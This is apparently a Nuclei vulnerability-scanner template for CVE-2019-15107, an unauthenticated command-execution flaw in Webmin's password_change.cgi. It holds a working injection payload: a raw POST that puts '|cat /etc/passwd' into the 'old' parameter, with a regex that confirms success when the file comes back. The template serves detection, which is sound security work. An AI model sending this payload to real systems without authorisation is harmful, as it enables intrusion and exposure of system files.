id: CVE-2019-15107 info: name: Webmin <= 1.920 Unauthenticated Remote Command Execution author: bp0lr severity: critical description: "Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi." reference: - https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2019-15107 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2019-15107 cwe-id: CWE-78 tags: cve,cve2019,webmin,rce requests: - raw: # - | POST /password_change.cgi HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: {{BaseURL}} Content-Type: application/x-www-form-urlencoded user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" # Enhanced by mp on 2022/03/29